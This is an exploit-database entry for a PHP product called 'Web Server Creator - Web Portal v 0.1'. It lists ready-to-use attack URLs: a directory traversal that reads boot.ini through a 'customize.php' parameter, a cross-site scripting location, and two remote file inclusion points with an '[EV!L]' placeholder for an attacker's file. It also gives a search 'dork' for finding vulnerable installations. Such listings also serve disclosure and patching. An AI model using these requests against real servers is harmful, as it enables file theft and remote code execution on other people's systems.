Web Server Creator - Web Portal v 0.1 Multi Vulnerability

2010-02-24T00:00:00
ID 1337DAY-ID-11067
Type zdt
Reporter indoushka
Modified 2010-02-24T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================
Web Server Creator - Web Portal v 0.1 Multi Vulnerability 
=========================================================

========================================================================================                 
| # Title    : Web Server Creator - Web Portal v 0.1 Multi Vulnerability     
| # Author   : indoushka   
| # Dork     : All right reserved 2002-2003 (MSN/Web Server Creator)                                       
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Multi                                                                    
======================      Exploit By indoushka       =================================
# Exploit  :
  
 1- Directory traversal (Windows)
 
http://127.0.0.1/1082_webserve-01/news/include/customize.php?l=../../../../../../../../boot.ini
   
 2- XSS
  
 http://127.0.0.1/1082_webserve-01/index.php?pg=forum
   
 3- RFI
  
 http://localhost/1082_webserve-01/index.php?pg=[EV!L]
  
 http://localhost/1082_webserve-01/news/form.php?path=[EV!L]



#  0day.today [2018-04-10]  #